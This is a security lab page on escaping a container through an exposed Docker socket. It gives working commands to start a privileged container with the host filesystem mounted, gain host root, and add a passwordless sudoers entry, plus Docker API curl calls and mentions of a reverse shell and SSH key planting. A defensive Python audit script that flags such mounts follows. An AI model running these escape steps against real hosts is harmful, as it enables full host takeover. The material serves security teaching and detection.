⚠️ Pracivo Security Lab — Docker escape, Kubernetes misconfig, CI/CD secret exposure, supply chain attacks.
Exposed Docker Socket — Container Escape
CONTAINER ESCAPE
HOST TAKEOVER
# Docker socket (/var/run/docker.sock) gives full control over the Docker daemon
# If it's mounted inside a container, you can escape to the host
# Step 1: Check if socket is mounted
ls -la /var/run/docker.sock
# srw-rw---- 1 root docker /var/run/docker.sock ← the leading "s" marks a socket; seeing it here means the host's Docker socket is mounted into this container
# Step 2: Use the socket to create a privileged container that mounts the host
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host --net=host --ipc=host -v /:/host alpine /bin/sh
# You are now in a new container with the HOST filesystem at /host
chroot /host # switch root to host filesystem
id # uid=0(root)
# Step 3: Add yourself to /etc/sudoers on the host
echo "ram ALL=(ALL) NOPASSWD: ALL" >> /host/etc/sudoers
# Or drop a reverse shell as root on the host
# Or add an SSH key to /host/root/.ssh/authorized_keys
# Alternative — via Docker API directly
curl --unix-socket /var/run/docker.sock http://localhost/containers/json
curl --unix-socket /var/run/docker.sock -X POST -H "Content-Type: application/json" -d '{"Image":"alpine","Cmd":["/bin/sh"],"Binds":["/:/host"],"Privileged":true}' http://localhost/containers/create
# Detect with: docker inspect container_name | grep -i "sock\|docker.sock"
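
The detection note above, extended into an added example (not part of the original lab page): it parses `docker inspect` JSON and flags a mounted Docker socket along with the settings used in Step 2 (`--privileged`, host namespaces, `-v /:/host`). The container names and sample input are constructed; the field names are the ones `docker inspect` emits.

```python
import json

# Constructed `docker inspect` output, trimmed to the fields the audit reads.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/ci-runner",
     "HostConfig": {"Privileged": False, "NetworkMode": "bridge",
                    "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Name": "/web", "Mounts": [],
     "HostConfig": {"Privileged": False, "NetworkMode": "bridge", "Binds": None}},
    {"Name": "/odd-alpine",
     "HostConfig": {"Privileged": True, "PidMode": "host", "NetworkMode": "host",
                    "IpcMode": "host", "Binds": ["/:/host"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host", "RW": True}]},
])

def bind_sources(container):
    """Host paths bound into the container, from both Mounts and HostConfig.Binds."""
    sources = {m.get("Source", "") for m in container.get("Mounts") or []
               if m.get("Type") == "bind"}
    for bind in (container.get("HostConfig") or {}).get("Binds") or []:
        sources.add(bind.split(":", 1)[0])
    return sources

def audit(inspect_json):
    """Return {container name: sorted findings}, listing risky containers only."""
    report = {}
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig") or {}
        findings = set()
        for src in bind_sources(c):
            if src.rstrip("/").endswith("docker.sock"):
                findings.add("docker-socket-mounted")
            elif src == "/":
                findings.add("host-root-mounted")
        if hc.get("Privileged"):
            findings.add("privileged")
        for key, label in (("PidMode", "host-pid"), ("NetworkMode", "host-net"),
                           ("IpcMode", "host-ipc")):
            if hc.get(key) == "host":
                findings.add(label)
        if findings:
            report[c.get("Name", "?").lstrip("/")] = sorted(findings)
    return report

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_INSPECT), indent=2))
```

On a Docker host, pass the output of `docker inspect $(docker ps -q)` to `audit()` in place of the sample.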